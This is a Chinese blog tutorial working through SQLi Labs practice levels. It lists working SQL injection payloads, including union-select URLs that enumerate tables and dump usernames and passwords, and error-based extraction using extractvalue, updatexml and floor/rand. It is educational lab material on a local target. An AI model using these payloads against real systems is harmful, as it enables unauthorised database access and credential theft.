【web安全】SQL注入漏洞2--绕过与利用

已于 2023-01-15 10:53:25 修改
阅读量357 收藏
点赞数 1
分类专栏: 计算机安全 文章标签: web安全
于 2023-01-14 23:01:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_37682263/article/details/128690478
版权

引言

上一篇我们讲了寻找SQL漏洞的思路,主要有黑白盒两种方式。这篇文章我再研究一下绕过SQL注入的绕过与利用。 我们都知道,不同的开发者, 对于安全认识程度也可能不一样,有的开发者可能没有对输入做过滤直接拼接,也有的开发者可能做了一定的过滤但是不全面,这些问题隐患都有可能造成安全风险。

为了学习SQL注入的绕过,我们将会练习SQL注入的靶场并选择几个典型的例子进行分享。

靶场搭建

主要参考文档:
https://www.modb.pro/db/231543

这里我使用的靶机环境是SQLi Labs, 这个平台专注于SQL注入的学习,并且涉及的题目量与知识点比较多,因此果断选择这个平台用来学习。

靶场的搭建也是比较简单,主要是下载SQLi Labs 的源码, 然后使用phpStudy 学习平台来运行即可。

  • 在https://github.com/Audi-1/sqli-labs 下载源码地址
  • 源码解压后拷贝到phpstudy 的WWW路径下, 修改sqli-labs里的配置文件
  • 启动phpstudy 以及对应的web服务, 注意PHP版本要使用5.* 版本,否则会出错。

然后,然后就可以愉快的玩耍了。

SQL注入前置知识点

SQL注入有哪些分类呢?

  • 按注入点进行分类
    数字型注入点
    字符型注入点
    搜索型注入点: 其实就是sql语句包含类似 like ‘%关键字%’ 这样的特征

  • 按数据提交方式分类
    GET注入
    POST注入
    Cookie注入
    Http头注入

  • 按照执行效果分类
    (1)基于布尔的盲注:即可以根据返回页面判断条件真假的注入。
    (2)基于时间的盲注:即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
    (3)基于报错注入:即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
    (4)联合查询注入:可以使用union的情况下的注入。
    (5)堆查询注入:可以同时执行多条语句的注入。
    (6)宽字节注入:利用gbk是多字节的编码,两个字节代表一个汉字

在练习注入过程中,发现了一些奇怪的sql语句,不搞懂这些,就很难弄明白这个注入是咋实现的。 因此,在这里介绍一下。

  • order by 数字
    表示按照第几个字段来排序, 可以用这个语句来探测一下某个表里有几个字段。

  • mysql的注释。
    巧妙的利用注释可以实现sql注入。

mysql 的注释有4种:
“#”  : # 开头到行尾的都为注释,只能注释一行
  “-- ” (2个减号 一个空格) : -- 开头到行尾都为注释 , 只能注释一行
 “/*   xxx */"   :  可以注释多行,但是一定要闭合,不然出错
  ”/*!  数字    代码  */"  :  可以跨行注释,但是一定要闭合,不然出错。

  • mysql 注入中的 --+可以用来在注入中起到注释的作用。
    其中的-- 表示注释,+可以转化为空格,这是因为某些http请求实现过程中+发送到服务端后会被转化成空格,这里也可以使用空格的url编码%20。其实也可以使用--空格 任意字符这样的方式起到注释的作用。

  • 如何让数据库产生错误并外带出数据库信息
    方法一:使用 floor , rand(), count(*) , group by 组合的方式配合完成错误注入

select count(*),(floor(rand(0)*2))x from information_schema.schemata group by x;

我们可以通过这个语句来触发主键冗余错误,具体原理可以查询一下哦。
不过,这个方法看起来比较麻烦,不利于快速实践,因此一般使用下面的方法二

方法二:extractvalue() 

extractvalue() :对XML文档进行查询的函数
其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样
语法:extractvalue(目标xml文档,xml路径)
如果第二个参数不是规定的类型, 那么报错就会带出信息,注入时在第一个参数处写入任意字符,在第二个参数处写入concat(1,payload)即可。(这里的1也可以是其他字符, 只要保证不是合法的输入类型即可)
有一点需要注意,extractvalue()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位
这里举个例子,查询前5位字符信息:
select username from security.user where id=1 and (extractvalue(‘anything’,concat(#’,substring(hex((select database())),1,5))))

方法三: updatexml()
与extractvalue()函数类似,这里在传入三个参数,在第三个参数上写上任意字符,其余与上一个函数使用方法相同。

靶场练习

  • 题目1(基于错误的GET单引号字符型注入)
http://127.0.0.1/Less-1/?id=-1'

触发了sql 语法报错,找到注入点。

http://127.0.0.1/Less-1/?id=-1' order by 4 --+

尝试出表的列数

http://127.0.0.1/Less-1/?id=-1' union select 1,2,3 --+

id = -1 使得条件不成立

http://127.0.0.1/Less-1/?id=-1' union select 1,2,database() --+

查询数据库对应的库名

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

查询数据库里有哪些表信息, 结果看到了一个user表。

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查看一下user表有哪几个字段, 结果看到了我们关注的user字段和password字段。

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(username) from security.users--+
http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(password) from security.users--+

获取对应的用户和密码。

  • 题目二
http://127.0.0.1:81/Less-2?id=1 and 1=1 --+

由于传入参数是数字类型, 就不需要’来闭合了。

  • 题目三
    这一关使用 ’)来闭合我们来看看源代码
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

我们看到,由于代码中有使用括号,我们要添加对应的括号闭合。

  • 题目四
    这一关使用")闭合,其余注入方式没有区别

  • 题目五
    这里,我们开始接触基于报错的sql注入。我们查看源代码可以发现,注入的sql,显示不出来了, 那么我们就无法获取信息。难道没有办法了吗, 其实,我摸可以人为的引起数据库的报错,但是数据库报错的同时也会把查询结果呈现在报错中

使用floor方式

select count(*),(floor(rand(0)*2))x from information_schema.schemata group by x;
获取库名
http://127.0.0.1/Less-5/?id=1' union select 1,count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a --+
获取表名
http://127.0.0.1/Less-5/?id=1' union select 1,count(*),concat((select (select group_concat(table_name) from information_schema.tables where table_schema='security')),floor(rand(0)*2))a from information_schema.tables group by a--+

使用extractvalue()函数报错

http://127.0.0.1/Less-5/?id=1' and (extractvalue(1,concat(1,(select database()))))  --+

使用updatexml() 函数报错

http://127.0.0.1/Less-5/?id=1'  and updatexml(1,concat(1,(select database())),1)  --+

小结

本文简单介绍了sqli labs 中的SQL注入绕过与利用方式。当然,SQL注入还有其他几个高级的方法,本文涉及到的也只是包括联合查询注入和 报错注入。这是较为基础的方式,其他的方式可以在需要用到的时候,继续研究一下。本文主要介绍了人工做SQL注入方法,当然,也有专门用于SQL注入的自动化攻击,提升攻击的效率。下面一篇文章中,我将会介绍一款在SQL注入中常常会用到的工具sqlmap,

参考资料:
https://blog.csdn.net/qq_41755084/article/details/127229077
https://www.sqlsec.com/2020/05/sqlilabs.html

Coder_preston
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab——Writeup21~38(各种过滤绕过WAF和)
weixin_45694388的博客
12-12 682
Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入) base64编码,单引号,报错型,cookie型注入。 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: mV0L3dlaXhpbl80NTY5NDM4OA==,size_16,color_FFFFFF,t_70) cookie的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的unam
SQL 登录注入脚本_项目实战 | SQL注入的“格局”
weixin_39531378的博客
11-16 154
文章来源:安译Sec0x00前言曾经搞站最经典的套路就是:注入拿到密码进后台,上传shell然后内核提权。但是实际环境中,往往会有注入后密码解不开、找不到后台等情况,所以现在有的师傅说sql注入还不如xss。0x01 详细步骤一.网站界面就不放了,打码太累了,直接跳到随意点点后发现可疑参数,并确定存在漏洞的截图。and 1=1页面显示正常,and 1=0页面空白确定存在数字型注入,o...
DVWA之SQL注入的步骤
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-23 6672
SQL注入详解步骤及dvwa靶场演示,本站所有文章均为原创,欢迎转载,请注明文章出处:https://blog.csdn.net/weixin_43847838/article/details/109833310。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
SQL注入绕过总结
菜鸟-传奇
02-24 444
SQL注入绕过总结 mysql手工注入方法 ?id=1%df’(测试是否存在注入,报错则存在) ?id=1%df’-- -(注释后面多余的’limit 0,1 页面正常) ?id=1%df’order by n-- -(order测试字段长度,报错则说明超出最大长度) ?id=-1%df’union select 1,2,3-- - ?id=-1%df’union select 1,2,da...
SQL注入,很详细
m0_63683040的博客
04-20 1515
SQL注入(数字、UNION、字符型、布尔盲注、时间、报错、堆叠) SQL注入漏洞的方法 1.数字注入 在浏览器地址栏输入:learn.me/sql/article.php?id=1,这是一个get型接口,发送这个请求相当于调用一个查询语句: PHP源码: $sql = "SELECT * FROM database_name WHERE id =",$_GET[‘id’] 在浏览器地址栏输入:learn.me/sql/article.php?id=2-...
SQL注入绕过空格
nihao_ma_的博客
05-07 2014
SQL注入之空格绕过技巧
pikachu漏洞测试平台之SQL注入(新手向)
T3rra_的博客
02-28 5937
pikachu漏洞测试平台之SQL注入(新手向) 以这篇博文简单记录一下我这个小菜鸡用pikachu靶场学习SQL注入的过程。 工具:火狐浏览器,burp suite。 SQL 注入概述 哦,SQL注入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一...
利用SQL注入漏洞登录后台的实现方法
12-15
当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下是对SQL注入的详细解释及其在登录后台中的实施方法。 1. **SQL注入的基本原理**: SQL注入的...
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞安全系统
05-01
具有SQL注入漏洞安全系统 抽象的 Web应用程序带来了新型的计算机安全漏洞,例如SQL注入。 这是一类基于输入验证的漏洞SQL注入的典型用法是从数据库泄漏机密信息,绕过身份验证逻辑或向数据库中添加未经授权的...
SQL注入技巧2-常用技巧总结(攻击向量)
10-11
以上总结了多种SQL注入技巧,包括绕过过滤机制、利用SQL语句特性、盲注技巧、特殊字符绕过、多字符编码绕过、SQL关键字绕过、使用注释和空格、多查询绕过以及利用数据库特性等。这些技巧不仅可以帮助测试人员在渗透...
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
WEB 漏洞-SQL 注入之堆叠及 WAF 绕过注入 SQL 注入是一种常见的 WEB 漏洞攻击方式,通过将恶意 SQL 语句嵌入到 Web 应用程序的输入参数中,从而访问、修改或控制数据库的数据。堆叠注入(Stacked Injections)是 ...
Web应用安全:使用SQL注入绕过认证.pptx
06-17
Web应用安全领域中,SQL注入是一种常见的攻击手段,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。在这个主题中,我们将详细探讨如何使用SQL注入绕过认证过程,主要关注两类注入——数字型...
渗透测试-SQL注入手法与绕过手段
Sgirll的博客
06-17 919
union select 1,group_concat(table_name),3:使用 UNION 操作符,这部分查询语句返回一个包含三列数据的结果集:第一列是数字 1,第二列是目标数据库中所有数据表的名称列表,这里使用了 GROUP_CONCAT 函数进行聚合拼接,第三列是数字 3。该攻击利用了 SQL 注入漏洞,通过修改原有的 SQL 语句,绕过了应用程序的输入校验机制,从而对目标数据库造成了安全风险。id=1:假定这是一个 Web 应用程序的 URL 查询字符串参数,指定了 id 参数的值为 1。
sql注入绕过方法总结
nigo134的博客
06-17 2756
转至:sql注入绕过方法总结_huanghelouzi的博客-CSDN博客_sql绕过 我们希望用户输入的 id 的值,仅仅是一个字符串,传入数据库执行,但是当输入了: 2 or 1=1 时,其中的 or 1=1 是作为了 sql语句 来执行的。常用的注释符有 实例 大小写绕过 常用于 的正则对大小写不敏感的情况,一般都是题目自己故意这样设计。 例如:waf过滤了关键字,可以尝试使用等绕过。 内联注释绕过 内联注释就是把一些特有的仅在MYSQL上的语句放在 中,这样这些
SQL注入漏洞学习之一:phpstudy集成环境搭建DVWA靶场
m0_71839248的博客
06-09 614
WNMP搭建DVWA靶场
SQL注入漏洞-绕过
HacHunter的博客
03-08 6745
绕过条件过滤 掌握了基本的注入手段。但是随着网站开发人员的安全意识的提高,纷纷使用了各种防注入的手段。最简单的就是条件过滤了。条件过滤,顾名思义就是黑名单机制,过滤掉符合条件的语句。因此我们要想办法绕过过滤,用其他方式来实现注入。 绕过伪静态 伪静态:伪静态通俗点说就是假的静态页面,也就是通过各种技术手段,让动态页面的URL看上去和静态页面的一样。 .htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。 我们这里利用.htaccess文件,配置重写引擎,来实现伪静
SQL注入绕过技巧
misiwole的博客
01-21 8587
转载自:https://blog.csdn.net/weixin_44940180/article/details/107717511 基本绕过方法 1.大小写 2.双写 3.编码,如URLEncode编码,ASCII编码绕过 4.内敛注释 空格绕过 1.用注释替换空格 select//user,password//from /**/users; 2.空格url编码%20 3.两个空格代替一个空格 4.用Tab代替空格 5.%a0=空格 6.如果空格被过滤,括号没有被过滤,可以用括号绕过 select(u
SQL注入绕过
weixin_33858336的博客
12-23 646
一、常用符号的绕过   1、空格 1 空格代替:+ %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 2 括号绕过:常用于基于时间延迟的盲注,例如构造语句: ?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23   2、“ = ”号 使用like 、rlike 、reg...
怎么在网络攻击中屹立不倒
最新发布
dexun123的博客
08-12 700
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
WEB漏洞挖掘:SQL注入绕过策略解析
然而,很多开发者并未充分意识到这一点,导致了大量SQL注入漏洞的出现。 过滤(白名单)是另一种防御策略,通过仅允许特定的字符或字符串输入,阻止任何可能破坏SQL语句的非法字符。然而,攻击者可能会使用编码技巧...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值